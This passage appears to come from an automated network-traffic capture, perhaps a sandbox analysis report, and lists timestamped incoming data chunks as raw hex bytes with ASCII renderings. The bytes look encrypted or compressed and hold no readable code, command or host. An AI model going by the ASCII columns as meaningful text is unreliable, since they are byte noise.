                                                                                                                                                2022-09-29 12:49:46 UTC11425INData Raw: fa b1 26 be 26 02 c0 b5 5d c3 97 f5 53 60 04 c2 68 a4 bd 0c b0 cb 6c 1a d8 ea 22 75 37 fd 54 2a 1a 38 71 d3 2b 60 fe 04 41 65 0b 49 74 db 82 bc ea 4a 24 7e c5 a8 60 2c b6 ed c2 8d 5f b8 ab e9 b4 37 97 1b c4 e2 79 06 d5 34 07 42 14 40 40 a6 f1 24 4c 56 81 a2 60 30 a1 de 1e 2e 16 14 29 da 1f 53 3f 51 c0 65 a9 0c 6d da b9 69 0c af 6e 38 8e b2 91 3a 88 5e 54 1a 76 1e 0f c9 8f 85 74 0d 44 28 4d 3d 7e 9d ea 11 3d 86 8c 00 a8 78 ad 09 2f 95 a8 85 35 47 a6 29 1a 16 63 3d e7 aa b3 ab 0e 70 b9 2a 13 10 57 b9 ac e6 a2 c2 d2 c5 70 1d b6 4d d4 6c 83 52 16 4e 6a 9c fd 3c 18 8e f0 36 e6 46 0a dc 7f f2 83 12 24 f0 e1 70 ad b3 6a 7d ad 1c d5 0e 09 20 88 09 d3 80 5f 8c 9c d2 ce d4 f2 54 37 e2 01 ad fa 98 d9 4e b5 96 1a fc 97 58 99 2d e7 a8 74 e3 64 18 31 c7 db e1 b5 f4 cd
                                                                                                                                                Data Ascii: &&]S`hl"u7T*8q+`AeItJ$~`,_7y4B@@$LV`0.)S?Qemin8:^TvtD(M=~=x/5G)c=p*WpMlRNj<6F$pj} _T7NX-td1
                                                                                                                                                2022-09-29 12:49:46 UTC11441INData Raw: 61 0f cb a0 48 2e 72 b7 9c f2 97 5f 7b 9e 48 90 38 93 26 5d 6e b8 d0 22 6f 33 0a 9b 3e b1 2f a2 7d e7 6a 28 dc 49 3a d9 2f 0e b3 e3 8b d8 40 e7 53 9c 7d 05 80 fa 4d 79 75 a8 a8 41 f9 92 b7 fc 61 ea 31 71 bb 0f 5c 03 4d 0c 03 0a 14 85 ef 91 dc b5 af 47 64 01 d8 2b 01 f0 37 35 75 0e eb 4e 2a 8e 74 48 89 ad 55 af f9 10 d5 46 8d c4 ff 79 31 c3 ee d0 b0 3f 89 b0 99 06 a6 6c 22 16 f7 b5 59 45 c0 a3 a1 07 cf ed 8d fa a7 22 55 2c 35 74 72 59 25 7d ac 1e 4c 05 a7 e3 cf a5 f9 e8 8f a6 0a 9f a1 77 b7 5a 39 8d 34 95 26 47 b5 37 aa b8 fe 58 2f 53 76 b8 47 90 4f ff d8 89 55 f4 f6 df e9 b8 57 8e 46 bf c6 b1 86 a8 e9 5b 8d 2f 39 50 13 66 73 7b bb a7 0a 98 68 54 be 98 9c a4 6a 39 47 18 1c dc 3a d3 f6 18 a2 80 9d 2e 8d 39 0c e9 3f 67 f2 06 88 5f 5e 68 51 1e e9 03 60 33 68
                                                                                                                                                Data Ascii: aH.r_{H8&]n"o3>/}j(I:/@S}MyuAa1q\MGd+75uN*tHUFy1?l"YE"U,5trY%}LwZ94&G7X/SvGOUWF[/9Pfs{hTj9G:.9?g_^hQ`3h
                                                                                                                                                2022-09-29 12:49:46 UTC11457INData Raw: 99 d5 13 b4 2b 13 e0 e0 91 a1 56 ef 4b 4b 34 2b cc 82 58 95 ae f3 f9 1c 05 14 83 23 ff eb dc 72 36 31 16 1e 49 ef 5f 93 2f 4e cf f9 1f 9a 4b bb 40 88 f2 a0 35 ef 4e 03 24 c0 b0 02 79 f0 9a 14 0a 73 f1 e2 e8 9a de 39 93 33 f5 1c 29 20 84 02 cb c9 b7 39 8d 18 4c a3 3e 49 44 50 ba 47 c3 5e 9c 1d b5 00 b0 bf 0c 55 71 39 1a 0c 1b 7a c6 bd 0d 7f e2 4f 22 dc b0 96 5e 6f 21 74 1f a2 cf 86 fa 66 59 17 d1 02 e6 94 e6 c1 0d 76 73 a7 44 5d 1e c0 41 61 3d e4 a7 31 8d 20 af 7f 6d 2e f6 c2 4f e0 9e 28 2a d9 9e bb 25 76 ba 94 b9 15 5c e6 21 c4 eb 73 c8 f1 2d 84 c1 67 2a c0 2d 33 a5 a0 7e b5 68 a1 49 45 3c 8d 4c 10 ea 0c c1 6d 15 8e 04 35 97 cf c3 dd 3c c9 d5 a5 22 90 c2 ab cf 9d 4c b5 bd fc 98 d1 07 ae 33 6a ea 5b 56 c9 ea c2 e3 f7 47 6a 1d a3 fe ae 40 9e 3a fb 07 39 8b
                                                                                                                                                Data Ascii: +VKK4+X#r61I_/NK@5N$ys93) 9L>IDPG^Uq9zO"^o!tfYvsD]Aa=1 m.O(*%v\!s-g*-3~hIE<Lm5<"L3j[VGj@:9
                                                                                                                                                2022-09-29 12:49:46 UTC11473INData Raw: e9 ce 87 d6 08 75 b4 b4 43 1d 8a fe df 42 89 74 b4 ed 4b 4f 27 44 bb bf 24 d1 2a 7d a9 c0 18 c0 3c 15 31 bc 5d 85 e4 5c b2 11 d1 e2 09 54 cc 0f d7 b1 83 16 74 56 75 69 04 3b 50 b2 e8 99 a7 b2 50 76 16 5a 5c b3 74 d2 3a a2 8d 72 ec ab 85 f0 b6 86 aa f0 1a 64 b0 b1 ac 15 7e 2a 6f 77 f8 76 73 9c 87 22 92 75 92 3e 20 88 08 64 7f 3c ec 07 aa 99 c1 7c e0 c7 03 e2 0e 99 dd 62 93 2f 2c d1 dd 5f 5b bb c9 f6 f4 09 a5 45 48 14 c7 47 7e 8a 91 b8 b9 12 ba 6b 81 32 78 bb 35 fd 10 13 ad 56 37 41 e6 da b2 dd 5c 2b 8d b6 b2 cb aa 94 ab ef 45 7a 50 d5 00 11 4e 0e 48 e5 85 bb 7b d8 66 4c 14 fc 33 6d 39 f6 5f 91 f1 6d 21 1a 3d 3c 22 0e 33 22 e8 a3 b1 ae 84 b4 38 d8 0c c4 da 8d d8 c9 6c 9a fe 6b 21 ec 02 30 98 b0 1f cb 8f 5a 33 82 41 93 78 19 21 83 13 f9 b9 42 3c 5b 5d cd f6
                                                                                                                                                Data Ascii: uCBtKO'D$*}<1]\TtVui;PPvZ\t:rd~*owvs"u> d<|b/,_[EHG~k2x5V7A\+EzPNH{fL3m9_m!=<"3"8lk!0Z3Ax!B<[]
                                                                                                                                                2022-09-29 12:49:46 UTC11489INData Raw: 5c bd a3 ca 98 f7 ae 88 b6 70 5e 4d af 6f 30 1f 6a 0d c1 b3 da 11 ee 82 df 31 5c d4 58 45 4b 50 42 c0 27 21 54 c8 a8 81 df 0d a1 8a 22 72 15 b0 05 61 55 4d af af d9 0a c5 73 fb 63 43 ae 13 1f 86 b4 ef ab 67 a4 74 35 f6 0e dd 62 9f 76 b2 e2 9e 71 12 c8 42 d2 c9 b1 89 01 f4 d0 89 77 79 a6 fe 36 c3 b9 02 0c 2d f0 8c 53 96 f2 ef 44 23 e9 93 6d 58 d8 43 58 7b 46 02 58 e3 ce 77 00 59 6a 62 bc cf d7 9c 8a e3 9d 41 b9 6f e5 47 f0 bb 37 58 0e 76 e5 b3 b7 d2 ae 68 14 51 c5 44 ad 3d e9 7f f8 44 bc 1d 86 2d a2 bc 17 ce 4d 73 d3 af 1e 42 2c 30 bb bf 6a 37 9c 5b f4 bd 77 36 42 ea 0d 21 87 27 aa 6e d2 f4 60 52 8a 0c ae f3 c5 10 f8 81 d0 eb e6 99 36 ed 50 44 a9 38 96 2a 6f d0 1b b6 4f b9 5a 1e 62 66 61 8f d0 6f 73 28 4d 4a 3a ef 35 96 b4 20 1b ce d8 c2 10 91 bc e4 ca dc
                                                                                                                                                Data Ascii: \p^Mo0j1\XEKPB'!T"raUMscCgt5bvqBwy6-SD#mXCX{FXwYjbAoG7XvhQD=D-MsB,0j7[w6B!'n`R6PD8*oOZbfaos(MJ:5
                                                                                                                                                2022-09-29 12:49:46 UTC11505INData Raw: bc fd 7b 95 5a a4 0d e3 a3 21 e7 62 94 79 14 91 83 57 25 89 a4 0e f2 af 8f 46 f9 0d 63 5b 97 22 8d a7 2b b3 35 8b 95 8a e9 13 b2 b7 3c 1d db 09 8a 57 bd e5 a7 56 a3 78 74 fa 57 23 5c a6 12 64 be 60 a5 b6 3f 29 3f ba 5c 19 0b 11 db 7f 03 ad 2c 94 78 99 f1 8a 0e 61 a9 88 3a ef e8 1b 37 ea a3 e1 87 99 c5 5c df 95 89 05 b0 48 80 25 3a 46 fe 33 36 b5 3c cc f6 bb 93 f1 e2 9c 4d a9 02 01 ce d5 71 30 19 a7 57 c4 96 19 e4 82 2a 05 57 ab 37 1f af 1f d9 b8 d4 76 cf a3 90 b8 b2 11 bf 05 98 88 df 0a 4c 7f 03 6c d2 5f d3 c9 65 04 c7 8a 46 5a b3 8b 32 34 42 25 27 e3 dd 95 a9 45 95 d5 1f 4c f1 1c 0f 18 01 52 e4 a7 72 86 23 1b e0 6e d5 14 43 4c b3 53 ab c4 54 12 9f 89 09 73 df cb 4a 27 da ec 69 ec 67 33 14 b7 8a 80 cf 90 ef 0a 72 f0 30 9e 84 3c 63 41 8a bd 53 35 96 01 fc
                                                                                                                                                Data Ascii: {Z!byW%Fc["+5<WVxtW#\d`?)?\,xa:7\H%:F36<Mq0W*W7vLl_eFZ24B%'ELRr#nCLSTsJ'ig3r0<cAS5
                                                                                                                                                2022-09-29 12:49:46 UTC11521INData Raw: 35 a0 58 8f 2f f5 e8 30 df b3 ed 98 7f c3 2e 69 41 a6 fa 69 86 93 b3 b7 26 15 f0 6d 61 57 99 d4 02 fb 8d 84 cc 5b 0d ab 30 6d c0 04 4b 41 0c e3 91 1a 3b 03 92 a4 ad 99 d9 2e 83 d4 7a 51 18 2b 96 f9 46 37 88 63 f7 30 0b c5 a3 26 96 b1 f1 ce 52 cc 5c 5c 4c e6 62 de 9d aa 4c f7 9a 59 80 fb 44 bf 4f 8a 03 05 54 69 b4 70 96 a2 35 b9 84 21 7d 63 79 65 df ba 7a 76 4f ba 8b 04 15 bb 68 50 01 35 97 6e 8c f0 3b 2d 8e ca 8d 4f 19 dc 52 1b 64 ba 9a 58 21 10 4c a6 1f ed 6d 3d 51 68 be d4 97 60 3b 6c 29 62 32 53 d6 eb 64 1f 91 0b 18 e6 32 ff 77 ac 65 2f 6a 22 64 95 8a ee f1 05 04 04 eb f1 e1 e4 4c c2 25 cd 7c 29 90 27 52 a1 f3 d4 99 b2 2e 4e 38 d7 34 06 53 a4 23 25 48 67 25 75 d4 e5 83 72 dc fe fe 42 2a 7d 27 68 e4 26 ce 97 df 2d ea 79 3a d2 b1 35 cc 57 e3 25 a2 86 24
                                                                                                                                                Data Ascii: 5X/0.iAi&maW[0mKA;.zQ+F7c0&R\\LbLYDOTip5!}cyezvOhP5n;-ORdX!Lm=Qh`;l)b2Sd2we/j"dL%|)'R.N84S#%Hg%urB*}'h&-y:5W%$
                                                                                                                                                2022-09-29 12:49:46 UTC11537INData Raw: fd 36 3a 68 9e 6c 4a 58 ce 63 f5 63 54 14 52 72 2f eb a1 c5 c7 a7 0b 3c dc b0 65 e0 1f b2 f4 c0 e9 8f 71 1e 41 f7 9c 73 7f 1b 4a 06 bf 57 f4 94 5c f1 50 4e 40 65 f9 12 0e 1c 64 3f 36 50 6a 84 99 58 dd 8f 0c 31 92 1e 0e 33 d6 ac 91 8a ca dc 22 f5 38 d0 82 f0 21 09 24 da 64 03 5c a0 9b 4b 50 1e 55 af e1 6a 7f 84 4f 45 10 3b 1e fe c7 31 8a 61 70 93 e8 f5 8d ca d5 99 4e ee ce 38 0b e9 45 f4 f0 c9 39 24 f1 53 50 6d 87 41 17 90 b5 1f 22 df 6d 59 c3 47 a2 8b 22 34 33 55 af 78 43 7e c1 a6 62 23 b7 71 98 b2 a4 a8 7f 37 26 1e 55 b4 03 cd bb b0 09 6d d9 77 c6 5f 70 e5 47 60 79 22 2b 6f 74 b9 55 06 4e 53 3c 5b 95 63 0e 56 2a 00 55 9f cb 2d ef c5 ed f5 43 31 bc 71 9e f9 cb ca 5a f5 7b 10 52 f3 b5 ae ac 0f 45 34 3b 94 4c ac 7a c3 6a 3b 13 b0 93 86 61 29 32 b3 d8 c2 b2
                                                                                                                                                Data Ascii: 6:hlJXccTRr/<eqAsJW\PN@ed?6PjX13"8!$d\KPUjOE;1apN8E9$SPmA"mYG"43UxC~b#q7&Umw_pG`y"+otUNS<[cV*U-C1qZ{RE4;Lzj;a)2
                                                                                                                                                2022-09-29 12:49:46 UTC11553INData Raw: dc 86 37 cd 84 85 39 22 e7 78 d5 7f 48 98 98 7c 20 34 76 1b 5f 57 70 5d 9f ec d1 2a 6b 2c f2 ca f5 9b 33 32 11 01 f3 87 57 cd 78 a7 48 53 7b c2 03 e7 60 85 89 53 07 55 48 6d 23 af fc 63 36 08 af 6b 0f a3 42 5f 81 34 f3 55 5e 81 63 af d3 86 c5 da 91 c3 e9 53 68 0d 7c a9 fa 58 2d d7 ec 3e d6 50 fa 45 19 9a 88 be 9a bf cf 9b 14 5c d3 4d 98 b3 fd fe 13 ae b2 4c cb b6 ec c6 87 7c f4 0e 34 10 f8 95 1f 5a c3 42 45 94 53 41 9d 4f 8a 28 48 e6 d4 c6 27 1d 01 ea 4d 3f ce 61 8c 3a 45 5b 7e 7a eb 04 50 da 4f 31 3a 20 62 fa 1e 9b 77 ca a3 76 6c fb 1d cc 1b 9d 79 4d 1d 3e 32 e6 ce f6 e4 59 7b 29 88 16 5a 86 dd 10 fe 2f 1e 55 1d 06 ba 86 45 3f 25 8f 04 29 69 2c 45 2b 1d 6a 6c 06 fb e4 42 c7 46 af 00 3c f8 dc b0 92 e3 22 df 67 a3 45 58 38 f8 54 26 11 a7 e8 be f8 56 65 1c
                                                                                                                                                Data Ascii: 79"xH| 4v_Wp]*k,32WxHS{`SUHm#c6kB_4U^cSh|X->PE\ML|4ZBESAO(H'M?a:E[~zPO1: bwvlyM>2Y{)Z/UE?%)i,E+jlBF<"gEX8T&Ve
                                                                                                                                                2022-09-29 12:49:46 UTC11569INData Raw: 70 3c 08 80 eb b6 ca a2 0c df 9c 88 0b 0e 31 97 be 88 a1 70 da 56 6e 84 c8 59 b4 7b e8 1a 30 c6 90 b3 5f 90 e2 0f 24 67 5a fa 17 61 2c c4 b0 51 23 f1 71 6d fe 87 e7 b0 e4 1b 9d 20 ab e6 d2 3d 49 e4 53 c8 84 98 11 5a 6d bb 94 25 6f fb 20 32 57 d4 ce 53 97 dd 3f 07 b4 e7 0c ac b2 18 4d 80 f0 69 1f 91 4c f3 89 bb 55 87 72 9a 89 70 ab 17 26 3a 18 5e f7 ab f9 94 05 04 d6 1b d9 c8 1e 0f e1 7c 29 1c 72 5c fc 9d b3 9e f8 af 46 ae 02 12 a0 a9 51 3b b0 0f 30 39 c6 c9 6c c5 f3 0b fc 0d d6 bf 3a 0f fd 25 2e b5 a5 f2 a7 4c 22 23 0f bc 68 dc f9 08 40 77 9f 5e 42 4c 77 64 0d 87 ef b2 28 71 40 6d a9 fa 27 49 3b 0b d6 7f fc 81 57 9c 7c 1b 74 8b 9a 24 8c e2 d2 9d 4a fc 30 28 6c dc 37 65 2f 9c 56 52 ff 0d 41 a3 e1 f1 c0 7a 22 52 4b 54 c4 28 59 4b 94 1f 7b 58 e2 02 09 76 66
                                                                                                                                                Data Ascii: p<1pVnY{0_$gZa,Q#qm =ISZm%o 2WS?MiLUrp&:^|)r\FQ;09l:%.L"#h@w^BLwd(q@m'I;W|t$J0(l7e/VRAz"RKT(YK{Xvf
                                                                                                                                                2022-09-29 12:49:46 UTC11585INData Raw: fb 52 37 61 a3 24 2c de 7d a0 04 97 ca 56 e3 a9 3c a8 57 88 01 22 c1 e7 7c 53 c2 54 03 86 d3 c2 6d ae 12 8a a8 b5 e2 81 c1 42 bf 0e f5 70 15 88 a4 78 39 e0 e4 77 58 06 74 6d 61 e6 b0 59 99 c9 db e5 14 51 69 86 0e c6 35 09 d5 83 54 0c 7a 8d b1 a0 87 96 28 2b 0a 2a 5d 0e f3 7d ee ae 9b 86 f7 de e0 d7 1c 30 89 e9 2a 33 e0 7f 3a 99 5b 06 f3 b9 c3 ca 1b 12 d2 b6 49 f2 bc e6 81 d8 58 ff 47 d8 00 53 00 de 95 fe e0 cc a5 fb 98 ea ac ad 34 88 1a c1 3e c4 6c bd ce e6 96 e6 35 26 04 5f ce 1d f9 b6 8d c6 d4 d7 85 c1 8e d3 94 83 33 2b 52 ac 17 f3 55 f8 54 84 1f 3e 19 f8 5c ef c3 1e 8b 0b a7 14 a3 50 db 94 64 62 53 08 82 dd 08 e0 92 1f 88 57 03 65 39 3f a7 37 5c fb 58 8a 8d 87 ed 87 d8 77 9a 49 e3 f2 ee 53 db 5c 50 c3 a9 19 df 7b ca 73 46 73 d9 8e 7e dd 07 df b3 5b be
                                                                                                                                                Data Ascii: R7a$,}V<W"|STmBpx9wXtmaYQi5Tz(+*]}0*3:[IXGS4>l5&_3+RUT>\PdbSWe9?7\XwIS\P{sFs~[
                                                                                                                                                2022-09-29 12:49:46 UTC11601INData Raw: 09 55 14 7e b8 6e 72 d2 1b a9 1b 6f 51 2b f4 3c 0d 1f 2c 88 14 80 ed e4 5b 3e 09 8f 92 a0 3b 9b 1c dd 09 f1 6e ca c5 fc 8c cd 95 01 87 df de 27 4e db 01 d2 5a ac 7f 8a ce 8b 24 c0 09 94 30 b6 fc bc 78 25 34 b2 41 b6 a3 bc 75 cd 87 b7 3d c3 b3 10 cd d2 dd a4 a3 16 92 ff cc 9c 61 ca 7a 7d 5a 80 cb 4a 20 5f bb be 1a 8d 8c f2 45 27 84 9c c2 a8 b6 14 00 e0 d3 c5 d0 95 c8 e0 7e d1 5c 19 c2 bd ee 7c 6c 98 18 9c b8 dd 68 68 ee 34 fb 3c 89 ae 42 0d 88 fd 70 2c 42 81 f3 08 5b a8 46 4b 34 15 05 03 22 17 b6 d7 18 f7 b9 5c 26 75 7c 32 b5 c4 ca 14 09 7b eb 74 19 90 51 9a 8a ad a3 8a e6 7e bc 47 44 10 df bd ef ec 89 d0 05 f5 69 dd fc 4d f2 11 d3 89 8e 7b 95 02 d1 2b e5 6d a7 46 e2 25 ee b9 e4 a0 2e e6 c6 41 9d 5c 94 4f 2c 06 9f 85 4c 23 19 d2 15 c2 99 03 33 a7 1c 02 55
                                                                                                                                                Data Ascii: U~nroQ+<,[>;n'NZ$0x%4Au=az}ZJ _E'~\|lhh4<Bp,B[FK4"\&u|2{tQ~GDiM{+mF%.A\O,L#3U
                                                                                                                                                2022-09-29 12:49:46 UTC11617INData Raw: 4b ce 72 69 52 67 85 bf 1d 97 6b 23 bd 57 ea 5f 9e 43 74 e9 f6 1d 3e 5c 03 cc ee c8 02 53 b1 9d a3 2c 33 94 22 93 c4 80 51 f3 67 fb 85 d1 44 5f 85 7a 80 be 60 71 d5 e9 33 66 c6 fe c9 86 ea 09 0e ef 82 1b aa a9 5b 0e 33 29 77 4c 31 b1 73 52 ed 57 c7 bc 59 12 77 ee 25 ee 07 08 44 79 95 8a 9f e7 85 9b 99 ed b2 91 2d 25 93 a5 1d 79 f0 84 47 3c f1 15 cf 86 fe 67 30 2a 03 13 6d 02 86 61 03 38 68 5a 44 c8 58 a7 9e 59 09 b4 66 18 24 47 f7 2f 1c 01 9c 86 9b 63 e6 8d 9e c7 9b f6 38 58 a3 95 b5 84 65 43 b4 77 b4 34 31 b4 b7 fd 4c 95 f4 be fd d3 34 30 4b 0b ad 2d b6 ce 08 59 b6 c3 2f 8f d1 cc 01 03 08 d1 16 9c 03 97 ee b7 51 bc cd 8b 8e 55 fd 0b 01 aa eb 6e fa f8 26 0f 68 1e c8 ab 79 85 8d c1 b7 64 d4 07 82 5e e4 de e2 c0 fc fb 2c 97 cc f2 e0 f9 e1 26 c8 1d c2 55 67
                                                                                                                                                Data Ascii: KriRgk#W_Ct>\S,3"QgD_z`q3f[3)wL1sRWYw%Dy-%yG<g0*ma8hZDXYf$G/c8XeCw41L40K-Y/QUn&hyd^,&Ug
                                                                                                                                                2022-09-29 12:49:46 UTC11633INData Raw: 52 3f 33 ac cd ac e3 13 a2 1d c7 b1 8f d0 da 7d 42 5a bf a4 c1 bc 48 16 ad 0c 20 92 34 a2 8b cc c4 82 85 46 bf e5 bc 5f a9 13 90 5d a3 a7 3c 03 87 45 01 cf 84 78 b2 a8 08 ab c9 f5 a1 bb eb 95 79 6a 3c bc 04 0f eb e5 2e 0f e3 54 96 6f 5e 6c 59 48 1b 28 aa ed e8 8a 62 45 b1 be 33 0a 53 f7 0a 71 0d 38 ae c6 c1 22 b6 48 be 1f 51 0d a5 fc e1 0d 8f 38 e3 f8 28 1e 0f 02 eb da f5 05 57 c5 64 41 c7 20 6d a8 e1 1b 4c 1d b1 ba 84 18 37 fb d9 21 48 1a 49 20 2d 36 4d f1 31 da 7e b8 d5 f9 49 a3 ac b0 05 6b fc 17 ba 89 ff d1 66 d7 ce 07 02 a6 ee 6e 03 41 97 a6 bd 45 84 10 9c c5 80 de 75 77 1c 36 e0 62 37 1a f3 45 cf 24 c5 3d 51 bb 0c 33 3e ee 46 cf c4 39 c9 f3 22 95 1a 26 8b e3 75 77 45 bc a8 bd 0e 80 e8 fd 38 00 5d 4c 2f 14 e3 09 26 3f 1c a6 ec b4 dc 39 c2 c1 25 bb fb
                                                                                                                                                Data Ascii: R?3}BZH 4F_]<Exyj<.To^lYH(bE3Sq8"HQ8(WdA mL7!HI -6M1~IkfnAEuw6b7E$=Q3>F9"&uwE8]L/&?9%
                                                                                                                                                2022-09-29 12:49:46 UTC11649INData Raw: a9 dc 29 52 1d d8 26 0c 74 40 91 9a ae 29 cb 1f f0 4b 0b 11 bd 97 20 13 53 1f 0f 5d 60 b7 5a 33 ee b1 ef 0f a6 3c 83 31 17 fa d0 cd 05 93 80 60 30 65 fa 5a 80 71 4b bb fb fa cb 6f ef ea 3a a8 e3 d8 44 a2 6e 6c af 2f 98 24 eb 12 07 14 c8 ae 72 25 0c bd 25 2f e7 f6 55 13 0b 3a 11 a4 76 45 29 8f e0 1a 6a f1 15 ac 0a 27 e8 43 7d 84 bd 3a fa 36 84 dd 4f 21 84 48 5e 93 8e 33 b9 dd f0 4a 08 19 72 2e 67 db a0 a3 ec 55 92 c8 51 12 a5 4c f7 d7 78 e6 08 38 40 d8 68 28 04 7e a1 18 a8 44 3a f0 10 6c 3c 36 af b8 d8 d2 76 a2 07 b4 ad 5f 7d e1 df 0f 90 b4 65 7f 12 37 3a 6e 18 0a d0 76 1b 74 61 c1 ad 76 36 ae 20 43 ed 16 c9 45 7a f1 35 ed 46 d8 6f f5 64 b2 18 bf 8f 6a ad cb aa 27 7d 25 59 f1 0c 66 18 f8 66 9b 4e 87 7e c6 51 41 36 b8 b6 ab 3e a9 3a d2 5c 0f fd e2 34 51 3c
                                                                                                                                                Data Ascii: )R&t@)K S]`Z3<1`0eZqKo:Dnl/$r%%/U:vE)j'C}:6O!H^3Jr.gUQLx8@h(~D:l<6v_}e7:nvtav6 CEz5Fodj'}%YffN~QA6>:\4Q<
                                                                                                                                                2022-09-29 12:49:46 UTC11665INData Raw: fb 94 9b 9e 41 f5 f3 b1 08 bf 17 23 e0 f8 1f 60 03 39 0b 7f 37 e1 45 cf 62 1d 2f fa 18 d1 b0 1d ef bd d9 56 51 4a a0 cf 08 87 0f 28 71 5b 0a 90 40 65 4a b9 80 83 56 7d 37 6f 64 f4 4a f7 d1 d6 3c 66 84 c3 01 87 da 1c e5 33 ed 15 70 19 db 94 b5 3b 22 bd 37 74 90 15 06 5d 51 c0 36 67 63 ab 1f f6 6c 2d 56 db 73 0d 21 3e d8 1c a5 43 ba 8f 03 1d bf 7d 84 08 4c 39 65 16 65 33 7e d9 a9 ec ee 40 e1 e4 b0 16 35 4c e6 46 18 7f ef 9e 95 13 5f 43 62 68 bd 05 a5 2a ee 1b 5b 3c b5 08 a6 44 04 3b b9 fd 50 d8 62 e2 04 d4 00 09 0d df 5a ac ff 4a 49 0f f9 e5 60 8e 38 a7 e6 b6 0a 76 ad c5 9f 6d 88 80 6f 80 bf 41 3e b5 9e 27 e5 6d 04 5b a8 5c ce 84 df 17 b1 82 d8 7f ef 1d dc e5 9f fa c1 62 71 0e c6 af 9f 99 10 89 72 66 55 9f 72 b0 0a cc 51 34 a2 c3 41 a0 6c d1 a4 34 11 cf 05
                                                                                                                                                Data Ascii: A#`97Eb/VQJ(q[@eJV}7odJ<f3p;"7t]Q6gcl-Vs!>C}L9ee3~@5LF_Cbh*[<D;PbZJI`8vmoA>'m[\bqrfUrQ4Al4
                                                                                                                                                2022-09-29 12:49:46 UTC11681INData Raw: 2e ac 64 02 28 0d af 04 74 6a 71 ec 43 bf 96 a5 e0 27 c9 f8 18 20 91 52 5e b7 b7 b4 0c b1 fd 31 8d 09 1d 32 00 b5 29 88 6b 0b a7 98 e1 1e 82 7b f8 87 73 e2 a6 5a 52 68 fa a8 a5 ca 67 bf 70 f9 76 e6 16 51 0d 9a 13 2d b5 d5 21 94 d1 68 3b f5 59 5a 49 2d 6b d6 18 df 47 07 d3 d6 5a 4f b7 be 21 c0 fe ad 46 6d e0 19 49 49 ac 99 b6 a8 c6 73 ca df 39 ae f6 41 79 36 74 e6 43 0e 44 92 04 33 56 4b f3 b1 08 b2 bb 62 a6 26 19 0d 4b 74 29 98 75 88 40 6e 1a 6c f7 08 5e f2 4a a9 33 e9 bf d9 ea 77 d1 73 36 ed c0 fb 35 05 54 c6 3b b0 57 9d 9f 59 f0 6d be ee 60 84 bb 6f 72 d5 64 43 11 16 02 d2 34 ae ac 61 55 e3 54 f2 37 83 18 c8 40 b1 76 74 eb 13 6a 36 55 ff b1 40 9f 6b 97 30 df b8 7b a0 4b 18 4d 73 b4 e9 56 63 de fc 7f 1f df 75 ec 08 e8 b8 b3 fa 06 a7 4a bf b9 37 0c b1 8f
                                                                                                                                                Data Ascii: .d(tjqC' R^12)k{sZRhgpvQ-!h;YZI-kGZO!FmIIs9Ay6tCD3VKb&Kt)u@nl^J3ws65T;WYm`ordC4aUT7@vtj6U@k0{KMsVcuJ7
                                                                                                                                                2022-09-29 12:49:46 UTC11697INData Raw: bb 33 ad e6 29 54 b1 3d 2f e7 02 db ae da e5 65 4f 91 4c ee 0d a1 6a 84 30 51 92 0b 5d 09 ab d2 1f 87 5f 72 d8 d1 53 0a 61 cb 42 19 20 6d 42 91 48 16 3e de 7f 84 af c1 e8 83 89 d4 d7 a9 53 27 90 7e 46 3e 93 be 00 98 7b 1b 57 13 e3 16 2c 0b 8a 8d 00 02 67 90 66 66 28 da 57 dd 57 b9 2e e1 4f a9 2b 94 89 3a 32 cc f8 0c 36 62 1c 7c c8 c2 97 33 cf c1 89 41 ff aa 9a ee 66 0c 72 32 83 9f 67 ec 4e f2 47 74 35 6e cb d1 70 a1 f5 c0 a9 d8 d4 11 46 56 a4 c6 3b 9f 56 72 73 dc 0d da 9e ff 8a bf 31 bf df eb 6b 82 3e 0b 3b cc ea a5 d1 0d 13 77 7d 7d f0 ef 94 5f d1 da d1 7a 95 94 ce 26 f7 f8 c8 26 48 b4 3d 87 e5 e9 a6 d2 6f 9b 33 af 57 df 84 e0 78 2e c7 27 30 b3 ab 76 76 69 8b 71 23 46 f8 80 2e 7c 44 93 15 e9 41 98 8b a4 17 e7 e8 6e 76 f1 c6 26 b6 28 d2 8e 91 2f 56 a5 e3
                                                                                                                                                Data Ascii: 3)T=/eOLj0Q]_rSaB mBH>S'~F>{W,gff(WW.O+:26b|3Afr2gNGt5npFV;Vrs1k>;w}}_z&&H=o3Wx.'0vviq#F.|DAnv&(/V
                                                                                                                                                2022-09-29 12:49:46 UTC11713INData Raw: 62 81 ae 94 9d 79 2b 47 72 85 a9 cd 35 fb 74 07 fe aa 21 17 c5 39 cc a1 fe de db 93 d1 14 da 48 b8 8c 9c 0b f1 d2 d3 59 91 c4 3c e8 9f 98 28 0a 9f 0f 04 28 68 f7 fd 10 d0 4a c4 eb d3 83 48 cc 38 f1 26 b3 5d 67 70 ea 84 08 89 76 7d f6 3e d8 44 41 bd b3 e9 8b 0b e4 fb 3a 1b 35 ad c3 a1 86 08 a1 77 28 a9 4a b1 a4 f2 a1 f1 b1 8b 0b ab 26 55 9f 7b 1a 5c 96 79 61 53 a7 b8 2b 1d de 34 9b 04 36 aa db 57 b1 e6 f0 b3 ef f6 1d f4 a5 8a 2d 72 7e 88 5a 74 17 92 5a fc f1 5e c1 ef 71 b1 09 71 e9 bd 22 71 f0 72 ef 77 8d e0 a2 08 27 3f c5 e5 0e 2f 74 be bf 45 89 c1 b5 8c f8 82 5a 39 6b a5 be bf bc 43 30 8f 1f 20 48 a0 f9 2b a6 76 7d 02 29 64 b3 eb 1c 05 4e 83 d0 ba 8c e6 fa 98 06 f4 86 cf e0 c4 66 9a b0 71 ed 68 3e 42 19 a1 64 f6 2f 19 44 7e f6 4c 35 5f 45 c2 da c4 b4 54
                                                                                                                                                Data Ascii: by+Gr5t!9HY<((hJH8&]gpv}>DA:5w(J&U{\yaS+46W-r~ZtZ^qq"qrw'?/tEZ9kC0 H+v})dNfqh>Bd/D~L5_ET
